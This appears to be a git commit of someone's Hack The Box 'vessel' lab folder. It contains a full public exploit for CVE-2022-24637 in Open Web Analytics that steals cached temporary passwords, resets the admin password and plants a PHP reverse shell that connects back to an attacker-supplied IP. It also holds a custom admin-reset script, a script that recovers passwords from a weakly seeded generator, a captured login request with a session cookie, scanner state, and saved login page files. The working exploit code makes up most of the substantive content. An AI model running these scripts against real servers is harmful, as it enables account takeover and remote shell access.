init htb

old htb folders

HTB/vessel/51026.py

@@ -0,0 +1,247 @@
+# Exploit Title: Open Web Analytics 1.7.3 - Remote Code Execution (RCE)
+# Date: 2022-08-30
+# Exploit Author: Jacob Ebben
+# Vendor Homepage: https://www.openwebanalytics.com/
+# Software Link: https://github.com/Open-Web-Analytics
+# Version: <1.7.4
+# Tested on: Linux 
+# CVE : CVE-2022-24637
+
+import argparse
+import requests
+import base64
+import re
+import random
+import string
+import hashlib
+from termcolor import colored
+
+def print_message(message, type):
+   if type == 'SUCCESS':
+      print('[' + colored('SUCCESS', 'green') +  '] ' + message)
+   elif type == 'INFO':
+      print('[' + colored('INFO', 'blue') +  '] ' + message)
+   elif type == 'WARNING':
+      print('[' + colored('WARNING', 'yellow') +  '] ' + message)
+   elif type == 'ALERT':
+      print('[' + colored('ALERT', 'yellow') +  '] ' + message)
+   elif type == 'ERROR':
+      print('[' + colored('ERROR', 'red') +  '] ' + message)
+
+def get_normalized_url(url):
+   if url[-1] != '/':
+      url += '/'
+   if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
+      url = "http://" + url
+   return url
+
+def get_proxy_protocol(url):
+   if url[0:8].lower() == 'https://':
+      return 'https'
+   return 'http'
+
+def get_random_string(length):
+   chars = string.ascii_letters + string.digits
+   return ''.join(random.choice(chars) for i in range(length))
+
+def get_cache_content(cache_raw):
+   regex_cache_base64 = r'\*(\w*)\*'
+   regex_result = re.search(regex_cache_base64, cache_raw)
+   if not regex_result:
+      print_message('The provided URL does not appear to be vulnerable ...', "ERROR")
+      exit()
+   else:
+      cache_base64 = regex_result.group(1)
+   return base64.b64decode(cache_base64).decode("ascii")
+
+def get_cache_username(cache):
+   regex_cache_username = r'"user_id";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:5:"(\w*)"'
+   return re.search(regex_cache_username, cache).group(1)
+
+def get_cache_temppass(cache):
+   regex_cache_temppass = r'"temp_passkey";O:12:"owa_dbColumn":11:{s:4:"name";N;s:5:"value";s:32:"(\w*)"'
+   return re.search(regex_cache_temppass, cache).group(1)
+
+def get_update_nonce(url):
+   try:
+      update_nonce_request = session.get(url, proxies=proxies)
+      regex_update_nonce = r'owa_nonce" value="(\w*)"'
+      update_nonce = re.search(regex_update_nonce, update_nonce_request.text).group(1)
+   except Exception as e:
+      print_message('An error occurred when attempting to update config!', "ERROR")
+      print(e)
+      exit()
+   else:
+      return update_nonce
+
+parser = argparse.ArgumentParser(description='Exploit for CVE-2022-24637: Unauthenticated RCE in Open Web Analytics (OWA)')
+parser.add_argument('TARGET', type=str, 
+                  help='Target URL (Example: http://localhost/owa/ or https://victim.xyz:8000/)')
+parser.add_argument('ATTACKER_IP', type=str, 
+                  help='Address for reverse shell listener on attacking machine')
+parser.add_argument('ATTACKER_PORT', type=str, 
+                  help='Port for reverse shell listener on attacking machine')
+parser.add_argument('-u', '--username', default="admin", type=str,
+                  help='The username to exploit (Default: admin)')
+parser.add_argument('-p','--password', default=get_random_string(32), type=str,
+                  help='The new password for the exploited user')
+parser.add_argument('-P','--proxy', type=str,
+                  help='HTTP proxy address (Example: http://127.0.0.1:8080/)')
+parser.add_argument('-c', '--check', action='store_true',
+                  help='Check vulnerability without exploitation')
+
+args = parser.parse_args()
+
+base_url = get_normalized_url(args.TARGET)
+login_url = base_url + "index.php?owa_do=base.loginForm"
+password_reset_url = base_url + "index.php?owa_do=base.usersPasswordEntry"
+update_config_url = base_url + "index.php?owa_do=base.optionsGeneral"
+
+username = args.username
+new_password = args.password
+
+reverse_shell = '<?php $sock=fsockopen("' + args.ATTACKER_IP + '",'+ args.ATTACKER_PORT + ');$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'
+shell_filename = get_random_string(8) + '.php'
+shell_url = base_url + 'owa-data/caches/' + shell_filename
+
+if args.proxy:
+   proxy_url = get_normalized_url(args.proxy)
+   proxy_protocol = get_proxy_protocol(proxy_url)
+   proxies = { proxy_protocol: proxy_url }
+else:
+   proxies = {}
+
+session = requests.Session()
+
+try:
+   mainpage_request = session.get(base_url, proxies=proxies)
+except Exception as e:
+   print_message('Could not connect to "' + base_url, "ERROR")
+   exit()
+else:
+   print_message('Connected to "' + base_url + '" successfully!', "SUCCESS")
+
+if 'Open Web Analytics' not in mainpage_request.text:
+   print_message('Could not confirm whether this website is hosting OWA! Continuing exploitation...', "WARNING")
+elif 'version=1.7.3' not in mainpage_request.text:
+   print_message('Could not confirm whether this OWA instance is vulnerable! Continuing exploitation...', "WARNING")
+else:
+   print_message('The webserver indicates a vulnerable version!', "ALERT")
+
+try:
+   data = {
+      "owa_user_id": username, 
+      "owa_password": username, 
+      "owa_action": "base.login"
+   }
+   session.post(login_url, data=data, proxies=proxies)
+except Exception as e:
+   print_message('An error occurred during the login attempt!', "ERROR")
+   print(e)
+   exit()
+else:
+   print_message('Attempting to generate cache for "' + username + '" user', "INFO")
+
+print_message('Attempting to find cache of "' + username + '" user', "INFO")
+
+found = False
+
+for key in range(100):
+   user_id = 'user_id' + str(key)
+   userid_hash = hashlib.md5(user_id.encode()).hexdigest() 
+   filename = userid_hash + '.php'
+   cache_url = base_url + "owa-data/caches/" + str(key) + "/owa_user/" + filename
+   cache_request = requests.get(cache_url, proxies=proxies)
+   if cache_request.status_code != 200:
+      continue;
+   cache_raw = cache_request.text
+   cache = get_cache_content(cache_raw)
+   cache_username = get_cache_username(cache)
+   if cache_username != username:
+      print_message('The temporary password for a different user was found. "' + cache_username + '": ' + get_cache_temppass(cache), "INFO")
+      continue;
+   else:
+      found = True
+      break
+if not found:
+   print_message('No cache found. Are you sure "' + username + '" is a valid user?', "ERROR")
+   exit()
+
+cache_temppass = get_cache_temppass(cache)
+print_message('Found temporary password for user "' + username + '": ' + cache_temppass, "INFO")
+
+if args.check:
+   print_message('The system appears to be vulnerable!', "ALERT")
+   exit()
+
+try:
+   data = {
+      "owa_password": new_password, 
+      "owa_password2": new_password, 
+      "owa_k": cache_temppass, 
+      "owa_action": 
+      "base.usersChangePassword"
+   }
+   session.post(password_reset_url, data=data, proxies=proxies)
+except Exception as e:
+   print_message('An error occurred when changing the user password!', "ERROR")
+   print(e)
+   exit()
+else:
+   print_message('Changed the password of "' + username + '" to "' + new_password + '"', "INFO")
+
+try:
+   data = {
+      "owa_user_id": username, 
+      "owa_password": new_password, 
+      "owa_action": "base.login"
+   }
+   session.post(login_url, data=data, proxies=proxies)
+except Exception as e:
+   print_message('An error occurred during the login attempt!', "ERROR")
+   print(e)
+   exit()
+else:
+   print_message('Logged in as "' + username + '" user', "SUCCESS")
+
+nonce = get_update_nonce(update_config_url)
+
+try:
+   log_location = "/var/www/html/owa/owa-data/caches/" + shell_filename
+   data = {
+      "owa_nonce": nonce, 
+      "owa_action": "base.optionsUpdate", 
+      "owa_config[base.error_log_file]": log_location, 
+      "owa_config[base.error_log_level]": 2
+   }
+   session.post(update_config_url, data=data, proxies=proxies)
+except Exception as e:
+   print_message('An error occurred when attempting to update config!', "ERROR")
+   print(e)
+   exit()
+else:
+   print_message('Creating log file', "INFO")
+
+nonce = get_update_nonce(update_config_url)
+
+try:
+   data = {
+      "owa_nonce": nonce, 
+      "owa_action": "base.optionsUpdate", 
+      "owa_config[shell]": reverse_shell 
+   }
+   session.post(update_config_url, data=data, proxies=proxies)
+except Exception as e:
+   print_message('An error occurred when attempting to update config!', "ERROR")
+   print(e)
+   exit()
+else:
+   print_message('Wrote payload to log file', "INFO")
+
+try:
+   session.get(shell_url, proxies=proxies)
+except Exception as e:
+   print(e)
+else:
+   print_message('Triggering payload! Check your listener!', "SUCCESS")
+   print_message('You can trigger the payload again at "' + shell_url + '"' , "INFO")

HTB/vessel/Login - Open Web Analytics.html

@@ -0,0 +1,89 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml"><head>
+        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
+        <title>Login - Open Web Analytics</title>
+        <!-- HEAD Elements -->
+<link rel="StyleSheet" href="Login%20-%20Open%20Web%20Analytics_files/owa.css" type="text/css">
+
+<script type="text/javascript" src="Login%20-%20Open%20Web%20Analytics_files/owa.js"></script>
+
+<script>
+
+// OWA CONFIG SETTINGS
+
+OWA.config.main_url = "http://openwebanalytics.vessel.htb/index.php";
+OWA.config.public_url = "http://openwebanalytics.vessel.htb/";
+OWA.config.baseUrl = "http://openwebanalytics.vessel.htb/";
+//OWA.config.js_url = "http://openwebanalytics.vessel.htb/js/";
+//OWA.config.action_url = "";
+OWA.config.images_url = "http://openwebanalytics.vessel.htb/modules/";
+OWA.config.log_url = "http://openwebanalytics.vessel.htb/log.php";
+OWA.config.modules_url = "http://openwebanalytics.vessel.htb/modules/";
+OWA.config.api_endpoint = "http://openwebanalytics.vessel.htb/api/index.php";
+OWA.config.ns = "owa_";
+OWA.config.link_template = "%s?%s";
+</script>
+
+
+<!-- END HEAD -->    </head>
+
+    <body>
+
+        <div class="owa">
+            <div id="header" style="text-align:center;">
+                <table width="100%">
+                    <tbody><tr>
+                        <td class="">
+                            <img src="Login%20-%20Open%20Web%20Analytics_files/owa_logo_150w.jpg" alt="Open Web Analytics"><br>
+                        </td>
+                    </tr>
+                </tbody></table>
+            </div>
+            <br>
+            
+
+            <br>
+                        <div style="width:340px; margin: 0px auto -1px auto;">
+    <div class="inline_h1" style="text-align:left;">Login</div><br>
+
+    <div style="width:340px; margin: 0px auto -1px auto; text-align:center;">
+
+        <!-- content goes here -->
+        <div id="login_box" style="color:#ffffff; padding:45px; height:210px; text-align:left;">
+
+            <form method="POST">
+
+            <div class="inline_h3"><b>User Name:</b></div>
+            <input class="owa_largeFormField" type="text" size="20" name="owa_user_id"><br><br>
+            <div class="inline_h3"><b>Password:</b></div>
+            <input class="owa_largeFormField" type="password" size="20" name="owa_password"><br><br>
+            <input type="hidden" size="70" name="owa_go" value="http://openwebanalytics.vessel.htb/">
+            <input name="owa_action" value="base.login" type="hidden">
+            <div style="text-align:;">
+            <input class="owa_largeFormField" type="submit" name="owa_submit_btn" value="Login">
+            </div>
+            </form>
+
+        </div>
+
+    </div>
+
+
+    <br>
+    <span class="info_text">
+    <a href="http://openwebanalytics.vessel.htb/index.php?owa_do=base.passwordResetForm">Forgot your password?</a>
+    </span>
+</div>
+
+
+
+
+            <br><br><br><br>
+            <div style="text-align:center">
+                <span class="inline_h4"><a href="http://www.openwebanalytics.com/">Web Analytics</a> powered by <a href="http://www.openwebanalytics.com/">Open Web Analytics</a>.</span>
+            </div>
+        </div>
+
+    
+
+<div style="display: block;"></div></body></html>

HTB/vessel/Login - Open Web Analytics_files/owa.css

@@ -0,0 +1,287 @@
+/* HTML ENTITIES*/
+
+body {border-color:#cccccc; background-color:; font-family:Helvetica,'Arial'; padding:0; margin: 0;font-size:12px;}
+th {padding:6px 6px 6px 6px; text-align:left;}
+td {padding: 2px 2px 2px 2px;}
+legend {font-size:16px;font-weight:bold;}
+fieldset{margin: 7px; padding: 20px; border:1px solid #cccccc;}
+div {margin:0;}
+
+.owa a {
+    color: #21759B;
+}
+
+.owa a:hover {
+    color: orange;
+}
+
+.owa .section {
+    background-color:#ffffff;
+    margin:20px;
+}
+
+/* COLORS */
+.red {background-color:red;}
+.yellow {background-color:yellow;}
+.green {background-color:green; color:#ffffff;}
+
+/* NAVIGATION */
+#sub_nav {padding:5px; background-color:#cccccc; width=100%; }
+.top_level_nav{font-size:20px;}
+.nav_links {list-style:none; margin:0px; padding:0px; }
+.nav_links li {float: left; padding:4px 20px 4px 20px;}
+.nav_links li a {text-decoration: none; }
+.nav_links ul {clear: both;}
+.post-nav {clear: both; margin:0px; padding:0px 0px 5px 0px;}
+.active_nav_link {background-color:#cccccc;}
+.host_app_nav {background-color:; vertical-align:middle;font-size:18px;padding:4px;}
+#owa_header {border-bottom: 1px solid #9f9f9f; background-color:#FFFFFF; padding:10px; font-size:16px; line-height:55px;}
+.owa_logo {float:left;padding-right:30px;  vertical-align: middle;line-height:normal;}
+.owa_navigation {float:left;vertical-align:middle;padding-top:10px;}
+.owa_navigation ul {list-style: none; padding: 0; margin: 0;float:left;padding-top:0px;}
+.owa_navigation li {text-decoration: none; float:left; margin: 2px;}
+.owa_navigation li a {
+    background: url() #fff bottom left repeat-x;
+    height: 2em;
+    line-height: 2em;
+    float: left;
+    width: 9em;
+    display: block;
+    border: 0 solid #efefef;
+    text-decoration: none;
+    text-align: center;
+    
+}
+
+#updates {
+	
+	background-color: #ffffff;
+	padding: 20px;
+}
+
+#updates p {
+	
+	font-size: 14px;
+}
+
+.owa_navigation li a:hover {
+	border-bottom: 2px solid orange;
+   
+}
+
+.owa_current{
+	
+	background-color: #e6e6e6;
+}
+
+.owa_nav_icon {
+	padding-right:10px;
+	opacity: 0.60;
+}
+
+/* FORMS */
+.form-row {border-bottom:1px solid #efefef;padding:10px; float:none;}
+.form-label {width:;}
+.form-field {position: relative; left: 120px;}
+.form-value {position: absolute; left: 380px; font-weight: bold;}
+.form-instructions {position: relative; left: 150px; font-size:12px; color: #9f9f9f;}
+.owa-button {
+    border-radius:4px;
+    background-color:orange;
+    padding:15px 30px 15px 30px;
+    color:#ffffff;
+    font-size:18px;
+    font-weight:bold;
+    border: 1px solid #efefef;
+    -moz-border-radius: 3px;
+    -webkit-border-radius: 3px;
+    margin: 25px 0px 0px 0px;
+    text-decoration: none;
+    cursor: pointer;
+
+}
+.owa-button:hover {
+    color: #000000;
+    border-color: #9f9f9f;
+    -moz-box-shadow:2px 2px 2px #999;
+    box-shadow:2px 2px 2px #999;
+    -webkit-box-shadow:2px 2px 2px #999;
+}
+
+.owa-button a  {
+    text-decoration: none;
+}
+
+.owa_pagination {float:left; overflow: hidden;}
+.owa_pagination ul {list-style: none; padding: 0; margin: 0;}
+.owa_pagination li {text-decoration: none; float:left; margin: 2px;}
+.owa_pagination li {
+    background: url() #fff bottom left repeat-x;
+    height:2em;
+    line-height:2em;
+    float: left;
+    width: auto;
+    display: block;
+    border: 0.1em solid #efefef;
+    color: ;
+    text-decoration: none;
+    text-align: center;
+    padding:0px 2px 0px 2px;
+}
+
+.owa_headerServiceMsg {border: 1px solid #efefef;border-left: 8px solid yellow; height: 25px; width: auto; padding:10px}
+
+
+/* HEADLINES */
+
+.inline_h1 {font-size:24px; font-weight:bold;}
+.inline_h2 {font-size:20px;}
+.inline_h2_grey {font-size:20px; color:#cccccc;}
+.inline_h3 {font-size:16px;}
+.inline_h4 {font-size:14px;}
+.headline {font-size:20px; background-color:orange;color:#ffffff;border-color:#000000;padding:8px; font-weight:bold;margin: 0px 0px 0px 0px;}
+.panel_headline {font-size:18px; background-color:#efefef;padding:10px;font-weight:bold;margin: 0px 0px 20px 0px;border-bottom:solid 1px}
+.sub-legend {font-size:16px;font-weight:bold; }
+
+/* DATA TABLES */
+
+.h_label {font-size:14px; font-weight:bold;}
+.indented_header_row {padding:0px 0px 0px 20px;}
+#layout_panels {border:1px solid #999999;border-collapse: collapse; width:100%; vertical-align:top;}
+.layout_panels td {border:1px solid #999999;border-collapse: collapse; vertical-align:top;}
+#panel {border-collapse: collapse; width:;border:0px;padding:10px; vertical-align:top;}
+td#panel {margin: 0px; padding-top:0px;width:;border-collapse: collapse;border:0px;}
+.layout_subview {margin: 0px; padding:0px;border-collapse: collapse; font-size: 16px; line-height: normal;}
+.subview_content{padding:10px;}
+.subview_content td {padding:20ps;}
+#nav_left {width:240px; padding:10px}
+#nav_left li {padding-bottom:5px;}
+.owa .introtext {padding:0px 10px 0px 10px; line-height: 25px;}
+
+
+/* WIZARD */
+
+.owa_wizard {}
+.owa_wizardNextText {text-align:left; font-size:20px;}
+
+/* FORMATING */
+.owa_largeFormField { font-size:18px;}
+.active_wizard_step {background-color:orange; color:#ffffff;border:1px solid #9f9f9f; padding:5px; font-weight:bold; font-size:16px;}
+.wizard_step {font-weight:bold; font-size:16px;}
+.visitor_info_box {width:40px; height:40px; text-align:center; padding:7px;}
+.owa_visitSummaryLeftCol {width:auto;}
+.owa_visitSummaryRightCol {padding-left:15px;width:auto; vertical-align: top;}
+.visit_icon {width:40px;}
+.visit_summary {width:100%;}
+.date_box {padding:4px;    border:solid 1px #999999;margin:2px;}
+.pages_box {padding:5px; border:solid 2px #999999; margin:0px 0px 0px 0px; text-align:center;}
+.large_number {font-size:24px; font-weight:bold;}
+.info_text {color:#999999;font-size:12px;}
+.legend_link {color:#999999;font-size:12px;font-weight:normal;}
+.legend_link a {text-decoration:underline;}
+.centered_buttons {margin-left:auto;margin-right:auto;}
+.snippet_text {color:;font-size:12px;}
+.snippet_text a {color:#999999;}
+.snippet_anchor {font-size:14px;font-weight:bold;}
+.visit_box_stat {width:42px;}
+.nav_bar{text-decoration:none;}
+.id_box{background-color:green;color:#ffffff;font-style:bold;font-size:18px;padding:6px;}
+.code {padding:7px;margin:0px 30px 0px 30px;background-color:; border: 1px dashed blue; font-size:10px;}
+.top_level_nav_link{padding:0px 5px 0px 5px; font-size:22px;}
+.visible {display:;}
+.invisible {display:none;}
+
+.owa .error, .owa .status {
+    color: #ffffff;
+    border: 2px solid #FF0000;
+    margin:20px 40px 20px 40px;
+    padding: 20px 10px 20px 20px;
+    background-color: #FF4040;
+    font-size: 14px; 
+}
+
+.owa .status {
+    background-color: #71ad2b;
+    border-color: #519600;
+    color: #FFFFFF;
+}
+
+.tiny_icon{width:10px;padding-left:0px;}
+.wrap {margin:0px;padding:10px;}
+.validation_error {color:red;}
+
+/* Admin Settings */
+.setting {padding:5px;border:1px solid #cccccc; margin:10px;}
+.setting .description {border:0px solid #cccccc; font-size:12px; padding: 2px 0 2px 0;}
+.setting .title {font-weight:bold; font-size:16px; padding: 2px 0 2px 0;}
+.setting .field {padding: 2px 0 2px 0;}
+
+/* LAYOUT */
+#admin_nav{font-size:12px;}
+#keywords{width:400px;}
+#side_bar {width:auto; color: ; border-right: 0px solid #000000; padding: 5px; background-color: ; font-size: 12px;}
+#login_box {
+    -moz-border-radius:10px 10px 10px 10px;
+    border-radius:10px 10px 10px 10px;
+    -webkit-border-radius:10px 10px 10px 10px;
+    background-color: #494444;
+}
+
+/* ROUNDER CORNERS */
+
+.spiffy{display:block;}
+.spiffy *{
+  display:block;
+  height:1px;
+  overflow:hidden;
+  font-size:.01em;
+  background:#494444}
+.spiffy1{
+  margin-left:3px;
+  margin-right:3px;
+  padding-left:1px;
+  padding-right:1px;
+  border-left:1px solid #b0aeae;
+  border-right:1px solid #b0aeae;
+  background:#767272}
+.spiffy2{
+  margin-left:1px;
+  margin-right:1px;
+  padding-right:1px;
+  padding-left:1px;
+  border-left:1px solid #ececec;
+  border-right:1px solid #ececec;
+  background:#6b6767}
+.spiffy3{
+  margin-left:1px;
+  margin-right:1px;
+  border-left:1px solid #6b6767;
+  border-right:1px solid #6b6767;}
+.spiffy4{
+  border-left:1px solid #b0aeae;
+  border-right:1px solid #b0aeae}
+.spiffy5{
+  border-left:1px solid #767272;
+  border-right:1px solid #767272}
+.spiffyfg{
+  background:#494444;}
+
+.owa div.goal-detail {
+    display: none;
+    padding:20px;
+}
+
+.owa span.optional {
+
+    font-size: 10px;
+    color: #9f9f9f;
+}
+
+.owa .formInstructions {
+    font-size: 10px;
+    color: #505050;
+
+    font-weight: normal;
+}
+
+.noedit {color: #999;}

HTB/vessel/ape.py

@@ -0,0 +1,41 @@
+from PySide2.QtCore import *
+def genPassword(j):
+    length = 32
+    char = 0
+    if char == 0:
+        charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890~!@#$%^&*()_-+={}[]|:;<>,.?'
+    else:
+        if char == 1:
+            charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
+        else:
+            if char == 2:
+                charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890'
+            else:
+                pass
+    try:
+
+        qsrand(j)
+        password = ''
+        for i in range(length):
+            idx = qrand() % len(charset)
+            nchar = charset[idx]
+            password += str(nchar)
+        return password
+    except:
+        print('error')
+def gen_possible_passes():
+    passes = []
+    j = -999
+    while True:
+        ps = genPassword(j)
+        if ps not in passes:
+            passes.append(ps)
+            print(len(passes))
+            #print(ps)
+        if ps == 'YG7Q7RDzA+q&ke~MJ8!yRzoI^VQxSqSS':
+            break
+        j += 1
+    with open('pass.txt', 'w') as ofile:
+        for p in passes:
+            ofile.write(p + '\n')
+gen_possible_passes()

HTB/vessel/exploit.py

@@ -0,0 +1,32 @@
+import requests, base64
+
+proxy = {'http':'http://127.0.0.1:8080'}
+
+if __name__ == '__main__':
+    print("requesting admin reset")
+    s = requests.session()
+    data = {
+        'owa_email_address':'admin@vessel.htb',
+        'owa_action':'base.passwordResetRequest',
+        'owa_submit':'Request New Password'
+    }
+    s.post("http://openwebanalytics.vessel.htb/index.php?owa_do=base.passwordResetForm", data=data, proxies=proxy)
+    print("false login on admin")
+    data = 'owa_user_id=admin&owa_password=password&owa_go=http%3A%2F%2Fopenwebanalytics.vessel.htb%2F&owa_action=base.login&owa_submit_btn=Login'
+    s.post('http://openwebanalytics.vessel.htb/index.php?owa_do=base.loginForm&owa_go=http%3A%2F%2Fopenwebanalytics.vessel.htb%2F&', data=data, proxies=proxy)
+
+    r = s.get('http://openwebanalytics.vessel.htb/owa-data/caches/1/owa_user/fafe1b60c24107ccd8f4562213e44849.php')
+    b = base64.b64decode(r.text[9:-6])
+    temp_pass = b.decode().split("temp_passkey")[1][57:89]
+    print(temp_pass)
+    data = f'owa_password=Password123&owa_password2=Password123&owa_k={temp_pass}&owa_action=base.usersChangePassword&owa_submit_btn=Save+Your+New+Password'
+    h = {
+        'Referer': 'http://openwebanalytics.vessel.htb/index.php?owa_do=base.usersChangePassword',
+        'Origin': 'http://openwebanalytics.vessel.htb',
+        'Content-Type': 'application/x-www-form-urlencoded'
+    }
+
+
+    r = s.post('http://openwebanalytics.vessel.htb/index.php?owa_do=base.usersChangePassword', headers=h, data=data, proxies=proxy)
+    print("Password changed to 'Password123")
+    pass

HTB/vessel/ferox-http_vessel_htb_dev_-1676229427.state

@@ -0,0 +1 @@
+{"scans":[{"id":"3ca0200c79d6459b9d307192914056ee","url":"http://vessel.htb/dev/","normalized_url":"http://vessel.htb/dev/","scan_type":"Directory","status":"Running","num_requests":1543829}],"config":{"type":"configuration","wordlist":"/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt","config":"/etc/feroxbuster/ferox-config.toml","proxy":"","replay_proxy":"","target_url":"http://vessel.htb/dev/","status_codes":[200,204,301,302,307,308,401,403,405,500],"replay_codes":[200,204,301,302,307,308,401,403,405,500],"filter_status":[],"threads":10,"timeout":7,"verbosity":1,"silent":false,"quiet":false,"auto_bail":false,"auto_tune":false,"json":false,"output":"/home/simon/htb/vessel/results/vessel.htb/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt","debug_log":"","user_agent":"feroxbuster/2.7.3","random_agent":false,"redirects":false,"insecure":true,"extensions":["txt","html","php","asp","aspx","jsp"],"methods":["GET"],"data":[],"headers":{},"queries":[],"no_recursion":true,"extract_links":true,"add_slash":false,"stdin":false,"depth":4,"scan_limit":0,"parallel":0,"rate_limit":0,"filter_size":[],"filter_line_count":[],"filter_word_count":[],"filter_regex":[],"dont_filter":false,"resumed":false,"resume_from":"","save_state":true,"time_limit":"","filter_similar":[],"url_denylist":[],"regex_denylist":[],"collect_extensions":false,"dont_collect":["tif","tiff","ico","cur","bmp","webp","svg","png","jpg","jpeg","jfif","gif","avif","apng","pjpeg","pjp","mov","wav","mpg","mpeg","mp3","mp4","m4a","m4p","m4v","ogg","webm","ogv","oga","flac","aac","3gp","css","zip","xls","xml","gz","tgz"],"collect_backups":false,"collect_words":false,"force_recursion":false},"responses":[{"type":"response","url":"http://vessel.htb/dev/f5c432c4141b49a69131b273e5f4a3f1","original_url":"http://vessel.htb/dev/","path":"/dev/f5c432c4141b49a69131b273e5f4a3f1","wildcard":true,"status":302,"method":"GET","content_length":26,"line_count":1,"word_count":4,"headers":{"date":"Sun, 12 Feb 2023 18:43:24 GMT","x-powered-by":"Express","location":"/404","content-type":"text/plain; charset=utf-8","vary":"Accept","content-length":"26","server":"Apache/2.4.41 (Ubuntu)"},"extension":""},{"type":"response","url":"http://vessel.htb/dev/6a3da44d15a94bd18bed521637f88473b78a1034aa284592a2772d5adc1275394b76ed61fc7b443a9cb577e3251694d8","original_url":"http://vessel.htb/dev/","path":"/dev/6a3da44d15a94bd18bed521637f88473b78a1034aa284592a2772d5adc1275394b76ed61fc7b443a9cb577e3251694d8","wildcard":true,"status":302,"method":"GET","content_length":26,"line_count":1,"word_count":4,"headers":{"server":"Apache/2.4.41 (Ubuntu)","location":"/404","x-powered-by":"Express","vary":"Accept","content-type":"text/plain; charset=utf-8","date":"Sun, 12 Feb 2023 18:43:24 GMT","content-length":"26"},"extension":""}],"statistics":{"type":"statistics","timeouts":0,"requests":585443,"expected_per_scan":1543829,"total_expected":1543829,"errors":0,"successes":2,"redirects":585399,"client_errors":42,"server_errors":0,"total_scans":1,"initial_targets":0,"links_extracted":0,"extensions_collected":0,"status_200s":2,"status_301s":0,"status_302s":585399,"status_401s":0,"status_403s":0,"status_429s":0,"status_500s":0,"status_503s":0,"status_504s":0,"status_508s":0,"wildcards_filtered":585395,"responses_filtered":585395,"resources_discovered":2,"url_format_errors":0,"redirection_errors":0,"connection_errors":0,"request_errors":0,"directory_scan_times":[],"total_runtime":[0.0]},"collected_extensions":[],"filters":[{"dynamic":18446744073709551615,"size":26,"method":"GET","dont_filter":false}]}

HTB/vessel/login.req

@@ -0,0 +1,15 @@
+POST /api/login HTTP/1.1
+Host: vessel.htb
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 27
+Origin: http://vessel.htb
+Connection: close
+Referer: http://vessel.htb/login
+Cookie: connect.sid=s%3AxFGMDnNrdEHwpJYDN-KEhuelb9SYqf3T.mm%2BW3ZMaNtbCmWTej79wYg69DLnFNCr8CM98z3OjKOg
+Upgrade-Insecure-Requests: 1
+
+username=user&password=pass

HTB/vessel/passwordGenerator.py

@@ -0,0 +1,177 @@
+# uncompyle6 version 3.9.0
+# Python bytecode version base 3.7.0 (3394)
+# Decompiled from: Python 3.10.9 (main, Dec  7 2022, 13:47:07) [GCC 12.2.0]
+# Embedded file name: passwordGenerator.py
+from PySide2.QtCore import *
+from PySide2.QtGui import *
+from PySide2.QtWidgets import *
+from PySide2 import QtWidgets
+import pyperclip
+
+class Ui_MainWindow(object):
+
+    def setupUi(self, MainWindow):
+        if not MainWindow.objectName():
+            MainWindow.setObjectName('MainWindow')
+        MainWindow.resize(560, 408)
+        self.centralwidget = QWidget(MainWindow)
+        self.centralwidget.setObjectName('centralwidget')
+        self.title = QTextBrowser(self.centralwidget)
+        self.title.setObjectName('title')
+        self.title.setGeometry(QRect(80, 10, 411, 51))
+        self.textBrowser_2 = QTextBrowser(self.centralwidget)
+        self.textBrowser_2.setObjectName('textBrowser_2')
+        self.textBrowser_2.setGeometry(QRect(10, 80, 161, 41))
+        self.generate = QPushButton(self.centralwidget)
+        self.generate.setObjectName('generate')
+        self.generate.setGeometry(QRect(140, 330, 261, 51))
+        self.PasswordLength = QSpinBox(self.centralwidget)
+        self.PasswordLength.setObjectName('PasswordLength')
+        self.PasswordLength.setGeometry(QRect(30, 130, 101, 21))
+        self.PasswordLength.setMinimum(10)
+        self.PasswordLength.setMaximum(40)
+        self.copyButton = QPushButton(self.centralwidget)
+        self.copyButton.setObjectName('copyButton')
+        self.copyButton.setGeometry(QRect(460, 260, 71, 61))
+        self.textBrowser_4 = QTextBrowser(self.centralwidget)
+        self.textBrowser_4.setObjectName('textBrowser_4')
+        self.textBrowser_4.setGeometry(QRect(190, 170, 141, 41))
+        self.checkBox = QCheckBox(self.centralwidget)
+        self.checkBox.setObjectName('checkBox')
+        self.checkBox.setGeometry(QRect(250, 220, 16, 17))
+        self.checkBox.setCheckable(True)
+        self.checkBox.setChecked(False)
+        self.checkBox.setTristate(False)
+        self.comboBox = QComboBox(self.centralwidget)
+        self.comboBox.addItem('')
+        self.comboBox.addItem('')
+        self.comboBox.addItem('')
+        self.comboBox.setObjectName('comboBox')
+        self.comboBox.setGeometry(QRect(350, 130, 161, 21))
+        self.textBrowser_5 = QTextBrowser(self.centralwidget)
+        self.textBrowser_5.setObjectName('textBrowser_5')
+        self.textBrowser_5.setGeometry(QRect(360, 80, 131, 41))
+        self.password_field = QLineEdit(self.centralwidget)
+        self.password_field.setObjectName('password_field')
+        self.password_field.setGeometry(QRect(100, 260, 351, 61))
+        MainWindow.setCentralWidget(self.centralwidget)
+        self.statusbar = QStatusBar(MainWindow)
+        self.statusbar.setObjectName('statusbar')
+        MainWindow.setStatusBar(self.statusbar)
+        self.retranslateUi(MainWindow)
+        QMetaObject.connectSlotsByName(MainWindow)
+
+    def retranslateUi(self, MainWindow):
+        MainWindow.setWindowTitle(QCoreApplication.translate('MainWindow', 'MainWindow', None))
+        self.title.setDocumentTitle('')
